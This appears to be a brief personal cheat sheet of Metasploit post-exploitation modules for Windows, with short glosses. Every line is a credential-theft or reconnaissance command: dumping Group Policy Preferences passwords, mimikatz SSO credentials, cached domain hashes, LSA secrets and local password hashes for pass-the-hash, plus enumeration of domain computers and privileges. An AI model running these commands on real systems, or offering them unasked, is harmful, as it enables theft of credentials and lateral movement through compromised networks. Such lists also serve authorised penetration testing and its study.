control – metasploit post exploits

run post/windows/gather/credentials/gpp

run post/windows/gather/credentials/sso

run post/windows/gather/cachedump

run post/windows/gather/lsa_secrets

run post/windows/gather/hashdump

run post/windows/gather/smart_hashdump

run post/windows/gather/enum_ad_computers

run post/windows/gather/win_privs

 

gpp – hunts for groups.xml

sso – mimikatz

cachedump – extract the stored domain hashes that have been cached

lsa_secrets – enumerate the LSA Secrets keys within the registry

hashdump – local admin hash use for PTH

smart_hashdump – local admin hash use for PTH but on speed

enum_ad_computers – lists all workstations in domain

win_privs – see rights and if UNC is on